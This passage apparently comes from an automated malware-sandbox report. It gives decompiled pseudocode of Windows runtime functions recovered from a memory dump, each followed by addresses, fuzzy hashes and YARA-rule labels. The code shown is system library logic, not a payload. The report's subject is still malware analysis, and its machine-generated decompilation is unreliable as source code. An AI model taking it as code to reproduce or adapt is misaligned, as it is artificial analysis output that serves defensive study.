						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04947B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04954620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                  0x04973d4c
                                                                  0x04973d50
                                                                  0x04973d55
                                                                  0x04973d5e
                                                                  0x049ae79a
                                                                  0x00000000
                                                                  0x049ae79a
                                                                  0x04973d68
                                                                  0x049ae789
                                                                  0x04973d9d
                                                                  0x04973da3
                                                                  0x04973daf
                                                                  0x04973db5
                                                                  0x04973dbc
                                                                  0x04973dc4
                                                                  0x04973dc9
                                                                  0x04973dce
                                                                  0x049ae7ae
                                                                  0x049ae7ae
                                                                  0x04973dde
                                                                  0x04973de2
                                                                  0x04973de7
                                                                  0x04973e0d
                                                                  0x04973e13
                                                                  0x04973e16
                                                                  0x04973e1e
                                                                  0x04973e25
                                                                  0x04973e28
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04973e2a
                                                                  0x04973e2f
                                                                  0x04973e37
                                                                  0x04973e37
                                                                  0x00000000
                                                                  0x04973e37
                                                                  0x04973e31
                                                                  0x00000000
                                                                  0x04973e31
                                                                  0x04973e20
                                                                  0x04973e20
                                                                  0x04973e35
                                                                  0x00000000
                                                                  0x04973de9
                                                                  0x04973de9
                                                                  0x04973de9
                                                                  0x04973dee
                                                                  0x04973dfd
                                                                  0x04973dff
                                                                  0x04973e02
                                                                  0x04973e05
                                                                  0x04973e05
                                                                  0x00000000
                                                                  0x04973df0
                                                                  0x04973de7
                                                                  0x049ae78f
                                                                  0x049ae794
                                                                  0x04973d79
                                                                  0x04973d84
                                                                  0x04973d89
                                                                  0x04973d8e
                                                                  0x00000000
                                                                  0x049ae7a4
                                                                  0x04973d96
                                                                  0x04973d9a
                                                                  0x00000000
                                                                  0x04973d9a
                                                                  0x00000000
                                                                  0x049ae794
                                                                  0x04973d6e
                                                                  0x04973d73
                                                                  0x00000000
                                                                  0x049ae7b5
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a887c9de2c2f2ed875cb766a573598392574b9d5d230abae982b95425a4c6d0d
                                                                  • Instruction ID: d1a4285826745cbcebd02a1943337c5587e5c5388620dd12870ad6ae81d8ac5d
                                                                  • Opcode Fuzzy Hash: a887c9de2c2f2ed875cb766a573598392574b9d5d230abae982b95425a4c6d0d
                                                                  • Instruction Fuzzy Hash: E7319C71B05615DBDB348F29C845A6ABBEAEF95700B05C47AE84ACB360F730E840E791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049B7016, Relevance: .1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 76%
                                                                  			E049B7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4a2d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E049B6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E049B6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04957D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04979AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0497B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04954620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                  0x049b7016
                                                                  0x049b701e
                                                                  0x049b702b
                                                                  0x049b7033
                                                                  0x049b7037
                                                                  0x049b703c
                                                                  0x049b703e
                                                                  0x049b7041
                                                                  0x049b7045
                                                                  0x049b704a
                                                                  0x049b7050
                                                                  0x049b7055
                                                                  0x049b705a
                                                                  0x049b7062
                                                                  0x049b7062
                                                                  0x049b705a
                                                                  0x049b7064
                                                                  0x049b7064
                                                                  0x049b7067
                                                                  0x049b7071
                                                                  0x049b7096
                                                                  0x049b709b
                                                                  0x049b70a2
                                                                  0x049b70a6
                                                                  0x049b70a7
                                                                  0x049b70ad
                                                                  0x049b70b3
                                                                  0x049b70b6
                                                                  0x049b70bb
                                                                  0x049b70c3
                                                                  0x049b70c3
                                                                  0x049b70c6
                                                                  0x049b70cd
                                                                  0x049b70dd
                                                                  0x049b70e0
                                                                  0x049b70e2
                                                                  0x049b70e2
                                                                  0x049b70ee
                                                                  0x049b7101
                                                                  0x049b70f0
                                                                  0x049b70f9
                                                                  0x049b70f9
                                                                  0x049b710a
                                                                  0x049b710e
                                                                  0x049b7112
                                                                  0x049b7117
                                                                  0x049b7118
                                                                  0x049b7118
                                                                  0x049b70bb
                                                                  0x049b711d
                                                                  0x049b7123
                                                                  0x049b7131
                                                                  0x049b7131
                                                                  0x049b7136
                                                                  0x049b713d
                                                                  0x049b713e
                                                                  0x049b713f
                                                                  0x049b714a
                                                                  0x049b714a
                                                                  0x049b7084
                                                                  0x049b7088
                                                                  0x00000000
                                                                  0x049b708e
                                                                  0x049b708e
                                                                  0x049b7092
                                                                  0x00000000
                                                                  0x049b7092

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ce70a45e41b3385eb4bcb7ab5dc55870c6bd737ce0eab1da2720ca525c4235b5
                                                                  • Instruction ID: 029bdefda57c033af537ca572081d9b82716e8b671d16e9e0630dec84d730fc6
                                                                  • Opcode Fuzzy Hash: ce70a45e41b3385eb4bcb7ab5dc55870c6bd737ce0eab1da2720ca525c4235b5
                                                                  • Instruction Fuzzy Hash: 7D3180726087519BC320DFA8C940AAAB7A9FFC8700F044A69F89587790E730F904C7E6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0495C182, Relevance: .1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 68%
                                                                  			E0495C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04957D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04A08D34(_v8, _t80);
					}
					E04952280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0494FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04A08833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0494FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0497B180();
						if(_a4 != 0) {
							E04952280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0495BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0495BB2D(_t16, _t15);
						E0495B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0494FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0494FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0494FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                  0x0495c18d
                                                                  0x0495c18f
                                                                  0x0495c191
                                                                  0x0495c19b
                                                                  0x0495c1a0
                                                                  0x0495c1d4
                                                                  0x0495c1de
                                                                  0x049a2d6e
                                                                  0x0495c1e4
                                                                  0x0495c1e4
                                                                  0x0495c1e4
                                                                  0x0495c1ec
                                                                  0x049a2d7d
                                                                  0x049a2d7d
                                                                  0x0495c1f3
                                                                  0x0495c1ff
                                                                  0x049a2d88
                                                                  0x049a2d8d
                                                                  0x049a2d94
                                                                  0x049a2d94
                                                                  0x049a2d9f
                                                                  0x049a2da4
                                                                  0x049a2dab
                                                                  0x049a2db0
                                                                  0x049a2db2
                                                                  0x049a2db3
                                                                  0x049a2db4
                                                                  0x049a2dbc
                                                                  0x049a2dc3
                                                                  0x049a2dc3
                                                                  0x0495c205
                                                                  0x0495c205
                                                                  0x0495c208
                                                                  0x0495c20e
                                                                  0x0495c211
                                                                  0x0495c216
                                                                  0x0495c219
                                                                  0x0495c21f
                                                                  0x0495c222
                                                                  0x0495c22c
                                                                  0x0495c234
                                                                  0x0495c23a
                                                                  0x0495c23f
                                                                  0x0495c245
                                                                  0x0495c24b
                                                                  0x0495c251
                                                                  0x0495c25a
                                                                  0x0495c276
                                                                  0x0495c27d
                                                                  0x0495c27d
                                                                  0x0495c25c
                                                                  0x0495c25c
                                                                  0x00000000
                                                                  0x0495c25e
                                                                  0x0495c1a4
                                                                  0x0495c1aa
                                                                  0x0495c1b3
                                                                  0x0495c265
                                                                  0x0495c26c
                                                                  0x0495c26c
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                  • Instruction ID: 61d641b66bfc44ca8fdfe02bd99e96ac1ca826e9d502096d44d9e0009f5fc00b
                                                                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                  • Instruction Fuzzy Hash: 7B311671701646AEE704EBB4D480BE9FB58BF82308F2481BAD81847351DB34BA55DBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496A70E, Relevance: .1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 92%
                                                                  			E0496A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4a27b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4a27b10 = 8;
					 *0x4a27b14 = 0x4a27b0c;
					 *0x4a27b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0496A990(0x4a27b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0496A840(__edx, __ecx, __ecx, _t52, 0x4a27b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4a27b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x4a27b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4a27b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L04954620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4a27b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0497F3E0(_t50,  *0x4a27b14, _t8 >> 3);
						_t28 =  *0x4a27b14; // 0x77f07b0c
						__eflags = _t28 - 0x4a27b0c;
						if(_t28 != 0x4a27b0c) {
							L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x4a27b14 = _t50;
						_t48 = _v12;
						 *0x4a27b10 = _t9;
						goto L6;
					}
					 *0x4a27b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                  0x0496a713
                                                                  0x0496a714
                                                                  0x0496a717
                                                                  0x0496a71d
                                                                  0x0496a720
                                                                  0x0496a722
                                                                  0x0496a727
                                                                  0x0496a74a
                                                                  0x0496a754
                                                                  0x0496a75e
                                                                  0x0496a768
                                                                  0x0496a76a
                                                                  0x0496a773
                                                                  0x0496a78b
                                                                  0x0496a790
                                                                  0x0496a792
                                                                  0x0496a741
                                                                  0x0496a741
                                                                  0x0496a743
                                                                  0x0496a749
                                                                  0x0496a749
                                                                  0x0496a732
                                                                  0x0496a73a
                                                                  0x0496a797
                                                                  0x0496a79d
                                                                  0x0496a7a3
                                                                  0x0496a7a9
                                                                  0x0496a7b6
                                                                  0x0496a7bc
                                                                  0x0496a7ca
                                                                  0x0496a7e0
                                                                  0x0496a7e2
                                                                  0x0496a7e4
                                                                  0x049a9bf2
                                                                  0x00000000
                                                                  0x049a9bf2
                                                                  0x0496a7ed
                                                                  0x0496a7f2
                                                                  0x0496a800
                                                                  0x0496a805
                                                                  0x0496a80d
                                                                  0x0496a812
                                                                  0x049a9c08
                                                                  0x049a9c08
                                                                  0x0496a818
                                                                  0x0496a81b
                                                                  0x0496a821
                                                                  0x0496a824
                                                                  0x00000000
                                                                  0x0496a824
                                                                  0x0496a7ae
                                                                  0x00000000
                                                                  0x0496a7ae
                                                                  0x0496a73c
                                                                  0x0496a73e
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 41cf2f6b61f695168ab9c3e5f48de8e5c3895502bff6dd095c972572c7102461
                                                                  • Instruction ID: ca6182c65c32021d7b7ad4110d3b7fc9f85bcfc63ac820514480eb51a73f33d9
                                                                  • Opcode Fuzzy Hash: 41cf2f6b61f695168ab9c3e5f48de8e5c3895502bff6dd095c972572c7102461
                                                                  • Instruction Fuzzy Hash: 4F3181B96002059FD721CF1CDA80F6977F9FBA6710F144969E007A7250D776BE02EB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049661A0, Relevance: .1, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 97%
                                                                  			E049661A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04965E50(0x49167cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04A09D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0493F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                  0x049661b3
                                                                  0x049661b5
                                                                  0x049661bd
                                                                  0x049661c3
                                                                  0x049661c7
                                                                  0x049661d2
                                                                  0x049661ff
                                                                  0x049661ff
                                                                  0x04966201
                                                                  0x04966207
                                                                  0x04966207
                                                                  0x049661d4
                                                                  0x049661d9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049661df
                                                                  0x049661e2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049661e6
                                                                  0x049661e8
                                                                  0x049661ee
                                                                  0x049661ee
                                                                  0x049661f9
                                                                  0x049a762f
                                                                  0x049a7632
                                                                  0x049a7635
                                                                  0x049a7639
                                                                  0x049a7640
                                                                  0x049a766e
                                                                  0x049a7675
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7681
                                                                  0x049a7689
                                                                  0x049a768d
                                                                  0x049a7691
                                                                  0x049a7695
                                                                  0x049a7699
                                                                  0x049a76af
                                                                  0x049a76b5
                                                                  0x049a76b7
                                                                  0x049a76b7
                                                                  0x049a76d7
                                                                  0x049a76dc
                                                                  0x00000000
                                                                  0x049a76dc
                                                                  0x049a76a2
                                                                  0x049a76a9
                                                                  0x049a7651
                                                                  0x049a7653
                                                                  0x049a7653
                                                                  0x049a7656
                                                                  0x049a7656
                                                                  0x00000000
                                                                  0x049a7656
                                                                  0x049a7644
                                                                  0x049a7646
                                                                  0x049a7648
                                                                  0x049a7648
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 14284d720442c2f0643270de925924b69661888705e2b0cff8253b02723a0640
                                                                  • Instruction ID: 8005e69b2b8407614a312664be6a8d014b754589793bc3cd09873f84d3fb38e0
                                                                  • Opcode Fuzzy Hash: 14284d720442c2f0643270de925924b69661888705e2b0cff8253b02723a0640
                                                                  • Instruction Fuzzy Hash: 1C317A716057018FD360DF59C905B26B7E9FB88B04F0949BDE8999B361E7B0F844CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0493AA16, Relevance: .1, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 95%
                                                                  			E0493AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x4a2d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x4a27b9c; // 0x0
					_t53 = L04954620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0497B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0497F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04946C59(_t53, _t51, _t58) != 0) {
							_t28 = E04965E50(0x491c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0496B230(_v32, _v28, 0x491c2d8, 1,  &_v24);
								_t28 = E0493F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                  0x0493aa25
                                                                  0x0493aa29
                                                                  0x0493aa2d
                                                                  0x0493aa30
                                                                  0x0493aa37
                                                                  0x0493aa3c
                                                                  0x04994458
                                                                  0x04994458
                                                                  0x04994472
                                                                  0x04994474
                                                                  0x04994476
                                                                  0x0493aa64
                                                                  0x0493aa74
                                                                  0x0499447c
                                                                  0x04994483
                                                                  0x04994492
                                                                  0x0493aa52
                                                                  0x0493aa54
                                                                  0x0493aa5e
                                                                  0x049944a8
                                                                  0x049944ad
                                                                  0x049944af
                                                                  0x049944b6
                                                                  0x049944b6
                                                                  0x049944b9
                                                                  0x049944bc
                                                                  0x049944cd
                                                                  0x049944d3
                                                                  0x049944d6
                                                                  0x049944e1
                                                                  0x049944e1
                                                                  0x049944e6
                                                                  0x049944e8
                                                                  0x049944fb
                                                                  0x049944fb
                                                                  0x049944e8
                                                                  0x00000000
                                                                  0x0493aa5e
                                                                  0x04994476
                                                                  0x0493aa42
                                                                  0x0493aa46
                                                                  0x0493aa48
                                                                  0x0493aa4c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4da3fd6c88292b2f136fa904a0769c0e1fbee6ff2597432448fba8bc91da0bd
                                                                  • Instruction ID: 1a6e239523081dd348690f0345c0929aca622fca5e972b337dcb3239d169ca7f
                                                                  • Opcode Fuzzy Hash: a4da3fd6c88292b2f136fa904a0769c0e1fbee6ff2597432448fba8bc91da0bd
                                                                  • Instruction Fuzzy Hash: 8831D172A00219ABDF119F68CD81A7FB7B9EF84704B014479F901EB150E775BE11DBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04978EC7, Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 93%
                                                                  			E04978EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x4a2d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04964E70(0x4a286e4, 0x4979490, 0, 0);
